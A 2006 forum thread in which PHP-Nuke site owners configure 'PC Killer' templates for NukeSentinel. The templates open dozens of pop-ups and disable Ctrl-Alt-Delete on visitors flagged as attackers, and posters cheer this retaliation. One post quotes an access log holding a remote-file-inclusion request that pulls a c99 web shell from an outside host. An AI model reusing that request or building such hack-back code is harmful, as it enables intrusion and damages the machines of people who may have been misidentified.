Ravens PHP Scripts: Forums
 

 

View next topic
View previous topic
Post new topic   Reply to topic    Ravens PHP Scripts And Web Hosting Forum Index -> Security - PHP Nuke
Author Message
bsweb
Regular
Regular


Joined: Jun 19, 2006
Posts: 57

PostPosted: Sat Jul 08, 2006 3:13 am Reply with quote

Hi,

Correct me if I am wrong but there seems to be an error in either the coding or the instructions for the PC Killer files.

The instructions say upload all files to your abuse folder BUT the code within the templates referencing the bite! ie the abuse.html file and code point to abuse/abuse.html which relative to the template files just will not exist - suggest it should be just abuse.html

If I am correct there must be a great number of people with toothless guard dogs out there.

--
Brian
(bsweb)
 
View user's profile Send private message
hitwalker
Sells PC To Pay For Divorce


Joined:
Posts: 5661

PostPosted: Sat Jul 08, 2006 5:12 am Reply with quote

Quote:
NukeSentinel(tm) will forward the attacker to one of these template pages

pay attention to the word "forward"

does this rings a bell ?
if not.....sentinel has the option to use a custom url...
in this case it would be pointed topwards the abuse file...
 
View user's profile Send private message
bsweb
PostPosted: Sat Jul 08, 2006 7:58 am Reply with quote

Good Afternoon hitwalker,

I appreciate what you are saying but I still believe this is not how the PC Killer files are meant to be accessed by the author of them.

I will explain what I mean:
By uploading the pc killer files you overwrite most but not all of the NS default abuse template files so in theory there is no reason to use the forward link to send abusers to abuse.html directly unless you wish to add bite to the one of the templates that were not replaced ie abuse_admin.tpl.

(On a side note personally I am glad that was not included in the K files as I managed to ban myself on more than one occasion shorty after installation) Embarassed

So as far as I can see the fact remains that the uploaded PC Killer template files (overwriting the default templates) still point to abuse.html in a directory that doesn't exist.

Please say I am correct otherwise I think I am going mad!
 
hitwalker
PostPosted: Sat Jul 08, 2006 8:09 am Reply with quote

but are you sure theres a problem?
The folder is called abuse calling it from the nuke root to abuse.html ,and all is there...meaning files that do excist....
so unless im missing something.....?

and btw...most security systems on a computer think theres a virus in the folder and therefore delete the "infected" file....
and yes.....thats abuse.html
 
bsweb
PostPosted: Sat Jul 08, 2006 8:39 am Reply with quote

Sorry to go on but when NS calls one of the uploaded template files, does not that template file (in the abuse directory) try to load the file abuse/abuse.html into an iframe from that relative position within the abuse directory (not from the nuke root) therefore attempting to load (from the nuke root point of view)abuse/abuse/abuse.html?

Hope I'm not wrong or I will feel very silly now


Quote:
and btw...most security systems on a computer think theres a virus in the folder and therefore delete the "infected" file....
and yes.....thats abuse.html

Thanks but I think I managed to get it uploaded to the server in tact.
My AV is AVG Antivirus from Grisoft, either its very clever or a bit stupid like me.
 
hitwalker
PostPosted: Sat Jul 08, 2006 8:46 am Reply with quote

no...your wrong about that...
the root of nuke is already set and therefor the file will be found...
another approach.....
if this is true what you say......
that means raven and other coders that use it never noticed this....
now tell me........do you believe that ?
 
bsweb
PostPosted: Sat Jul 08, 2006 9:10 am Reply with quote

Oh dear, me again I'm afraid.

Now what I did to test my theory was copy one of the PC killer template files and then substituted a test.html reference instead of abuse.html.

I then created a test.html file and uploaded both these to the abuse directory.

I then called the template file from my browser and the test.html file was not found.

I then created an abuse directory with the abuse direcory and moved the test.html file there. Then I called the template file again and test.html was found proving my point (or so I thought )

Quote:
another approach.....
if this is true what you say......
that means raven and other coders that use it never noticed this....
now tell me........do you believe that ?

Obviously no but maybe they do not bother with the template files and forward directly to the abuse.html file directly as you were suggesting at first, admitedly even that sounds a bit far fetched.

I can only assume that I am totally missing a fundimental point which I would be grateful if you could point out to me after reading this post to put me out of my misery.
 
hitwalker
PostPosted: Sat Jul 08, 2006 9:27 am Reply with quote

well i use it in a different way....
i dont use the templates....
point with the killer templates is that every person that runs into sentinel ends up with a computer hungup..

but now by using the forward i decide who gets toasted..

but basically from the root to abuse/abuse.html should be ok..
i dont know what your doing or testing and how.....
what you can try is to change :
Code:
<iframe frameborder="0" height="100%" name="abuse" src="abuse/abuse.html" width="100%">



to

Code:
<iframe frameborder="0" height="100%" name="abuse" src="/abuse/abuse.html" width="100%">

 
bsweb
PostPosted: Sat Jul 08, 2006 9:49 am Reply with quote

So the template files are wrong after all then.

Also as the template and abuse.html files are in the same directory why not just
Code:
<iframe frameborder="0" height="100%" name="abuse" src="abuse.html" width="100%"> 


Just to complete the circle:
To quote the download page:
Quote:
HOW THEY WORK:
When there's an attack on your site NukeSentinel(tm) will forward the attacker to one of these template pages, where he/she will get more then they were looking for.... Smile
The templates in combination with the included abuse.js and abuse.html will render multiple pop-up windows and dissable the (ctrl)(alt)(delete) keys on the atacker PC. Forcing them to manualy shutdown thier PC.


If people use as described above the templates that are overwritten by PC Killer templates will not work as intended and there must be a great number of people with toothless guard dogs out there.

Right or wrong?

You must be really fed up with me by now, many thanks for your patience hitwalker.
 
hitwalker
PostPosted: Sat Jul 08, 2006 10:23 am Reply with quote

no thats ok....
but no matter what..
if someone gets banned the killer templates are just an addon to the banning process,a kick in the butt..

and just extra....

i use the forward to abuse.html and works flawless..
but ive send a pm to raven if he can reply to this...
 
Guardian2003
Site Admin


Joined: Aug 28, 2003
Posts: 6793
Location: Ha Noi, Viet Nam

PostPosted: Sat Jul 08, 2006 10:25 am Reply with quote

Please bear in mind these templates were created when Sentinel was in its infancy - at a guess, they are well over a year old and probably closer to two years old. The paths were obviously correct at that time.... but things may well have changed.....

I would take Hitwalkers advise and upload the templates etc anywhere you want (they do not HAVE to be in the abuse folder) and then simply use the 'forward to' option in the blocker settings.

Also, there are some things changed in the next version of Sentinel (2.2.5) which I cannot publicly discuss (until its official public release) but using something other than the abuse folder and using the forwarding as mentioned would be better - trust me.
 
View user's profile Send private message Send e-mail
Raven
Site Admin/Owner


Joined: Aug 27, 2002
Posts: 17086

PostPosted: Sat Jul 08, 2006 12:28 pm Reply with quote

When you use the PC Killer script, you place this in the Forward section of the blocker setting. Note that it's a fully qualified URI.
Only registered users can see links on this board! Get registered or login!

Now, please notice that in includes/nukesentinel.php, you find this code:

function abget_template($template="") {
global $nuke_config, $ab_config, $nsnst_const, $db, $prefix, $ip, $abmatch;
if(empty($template)) { $template = "abuse_default.tpl"; }
$sitename = $nuke_config['sitename'];
$adminmail = $nuke_config['adminmail'];
$adminmail = str_replace("@", "(at)", $adminmail);
$adminmail = str_replace(".", "(dot)", $adminmail);
$adminmail2 = urlencode($nuke_config['adminmail']);
$querystring = get_query_string();
$filename = "abuse/".$template;


This script is running relative to nuke root, so abuse/".$template; resolves correctly.


Last edited by Raven on Sat Jul 08, 2006 3:04 pm; edited 1 time in total 
View user's profile Send private message
bsweb
PostPosted: Sat Jul 08, 2006 1:57 pm Reply with quote

Many thanks for all the comments and advice.

When I want PC Killer to intervene I will ammend the blocker settings in the appropriate sections to forward as advised.

You probably have this in hand but just in case a suggestion:
I presume the description in the download section will be ammended so new subscribers will be informed and not waste their time just uploading and leaving their ns settings as they are.

I am really impressed by the program and website and (unusually) by all the excellent and quick support given.

Cheers
Cheers
Brian
(bsweb)
 
vartax
New Member
New Member


Joined: Jan 24, 2006
Posts: 7
Location: Amsterdam, the Netherlands

PostPosted: Wed Jul 12, 2006 6:57 am Reply with quote

I installed those files also and followed the steps as explained in the accompanied docs and when browsing my acces logs i found several references to users that used a shell99 attack being redirected and looped to the killer files so I guess it works how it should be.

Rene

Code:
88.240.136.70 - - [05/Jul/2006:17:33:09 -0400] "POST /SQuery/lib/armygame.php?libpath=http%3A%2F%2Fsvt.nukleon.us%2Ftools%2Fc99shell.txt%3Fcmc&act=f&f=HttpClient.class.php&ft=edit&d...

88.240.136.70 - - [05/Jul/2006:17:33:23 -0400] "GET / HTTP/1.1" 200 643 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
88.240.136.70 - - [05/Jul/2006:17:33:24 -0400] "GET /abuse/abuse.html HTTP/1.1" 200 2020 "http://www.teamfraggers.nl/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
88.240.136.70 - - [05/Jul/2006:17:33:26 -0400] "GET /abuse/abuse.js HTTP/1.1" 200 2549 "http://www.teamfraggers.nl/abuse/abuse.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
88.240.136.70 - - [05/Jul/2006:17:33:27 -0400] "GET /abuse/GanjaUK.swf HTTP/1.1" 200 565 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
88.240.136.70 - - [05/Jul/2006:17:33:27 -0400] "GET /abuse/abuse.swf HTTP/1.1" 200 5024 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
88.240.136.70 - - [05/Jul/2006:17:33:31 -0400] "GET / HTTP/1.1" 200 643 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
88.240.136.70 - - [05/Jul/2006:17:33:32 -0400] "GET /abuse/abuse.html HTTP/1.1" 304 - "http://www.teamfraggers.nl/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
88.240.136.70 - - [05/Jul/2006:17:33:38 -0400] "GET /abuse/abuse.html HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
88.240.136.70 - - [05/Jul/2006:17:33:38 -0400] "GET /abuse/abuse.js HTTP/1.1" 304 - "http://www.teamfraggers.nl/abuse/abuse.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
88.240.136.70 - - [05/Jul/2006:17:33:39 -0400] "GET /abuse/GanjaUK.swf HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
88.240.136.70 - - [05/Jul/2006:17:33:39 -0400] "GET /abuse/abuse.swf HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
88.240.136.70 - - [05/Jul/2006:17:33:47 -0400] "GET /abuse/abuse.html HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
88.240.136.70 - - [05/Jul/2006:17:33:47 -0400] "GET /abuse/abuse.html HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
88.240.136.70 - - [05/Jul/2006:17:33:47 -0400] "GET /abuse/abuse.html HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
88.240.136.70 - - [05/Jul/2006:17:33:47 -0400] "GET /abuse/abuse.js HTTP/1.1" 304 - "http://www.teamfraggers.nl/abuse/abuse.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
88.240.136.70 - - [05/Jul/2006:17:33:47 -0400] "GET /abuse/abuse.js HTTP/1.1" 304 - "http://www.teamfraggers.nl/abuse/abuse.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
88.240.136.70 - - [05/Jul/2006:17:33:48 -0400] "GET /abuse/abuse.js HTTP/1.1" 304 - "http://www.teamfraggers.nl/abuse/abuse.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
88.240.136.70 - - [05/Jul/2006:17:33:48 -0400] "GET /abuse/GanjaUK.swf HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
88.240.136.70 - - [05/Jul/2006:17:33:48 -0400] "GET /abuse/abuse.swf HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
88.240.136.70 - - [05/Jul/2006:17:33:48 -0400] "GET /abuse/GanjaUK.swf HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
88.240.136.70 - - [05/Jul/2006:17:33:49 -0400] "GET /abuse/abuse.swf HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
88.240.136.70 - - [05/Jul/2006:17:33:49 -0400] "GET /abuse/GanjaUK.swf HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
88.240.136.70 - - [05/Jul/2006:17:33:49 -0400] "GET /abuse/abuse.swf HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
 
View user's profile Send private message Visit poster's website
bsweb
PostPosted: Wed Jul 12, 2006 7:20 am Reply with quote

Thanks Vartax, guess some clever coding fooled me! (that's not difficult)

Even so as Guardian2003 suggested:
Code:
Also, there are some things changed in the next version of Sentinel (2.2.5) which I cannot publicly discuss (until its official public release) but using something other than the abuse folder and using the forwarding as mentioned would be better - trust me.
 
Guardian2003
PostPosted: Wed Jul 12, 2006 9:20 am Reply with quote

The reason I said that, now that the version is public is because didn't want you to over write any exisiting work you had done when you installed this new version of Sentinel.

You could of course modify the new templates to include the abuse script but for maximum flexibility I prefer to redirect mine.
 
vartax
PostPosted: Tue Jul 18, 2006 2:10 pm Reply with quote

NICE, In the new version 2.5.00 is that new feature to manage your templates and I thouhgt 'He let's see if and how those killer templates work out" pppfffttt was I lucky to have my IP protected Sad man o man and how they work. really had to reboot my PC because those 30+ opening browser screens are not closable with F4 or any other combi.
Haha, while doing my daily acceslog scans I see a lot of script kiddo's getting trapped !!!!

Rene


Last edited by vartax on Wed Jul 19, 2006 3:14 am; edited 1 time in total 
montego
Site Admin


Joined: Aug 29, 2004
Posts: 9453
Location: Arizona

PostPosted: Tue Jul 18, 2006 8:40 pm Reply with quote

vartax, fun isn't it? Laughing

_________________
Only registered users can see links on this board! Get registered or login!
Only registered users can see links on this board! Get registered or login! 
View user's profile Send private message Visit poster's website
myrtletrees
Involved
Involved


Joined: Sep 13, 2005
Posts: 259
Location: Cornfields of Indiana

PostPosted: Wed Jul 19, 2006 6:38 am Reply with quote

This topic helped me a lot, thanks.

One thing I noticed though, when pointing my firefox browser to the abuse.html to test it, Firefox blocks the pop-ups and when I click the flash image on the page, it opens about 30 tabs in the one browser that I was able to simply close and it closed them all, no need to reboot for me.

Maybe IE users will get the full effect?

hitwalker, which of the blocker settings do you suggest I forward to the abuse page? All of them or just maybe union, filters admin and clike?
 
View user's profile Send private message
Display posts from previous:       
Post new topic   Reply to topic    Ravens PHP Scripts And Web Hosting Forum Index -> Security - PHP Nuke

View next topic
View previous topic
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
You can attach files in this forum
You can download files in this forum


Powered by phpBB © 2001-2007 phpBB Group
All times are GMT - 6 Hours
 
Forums ©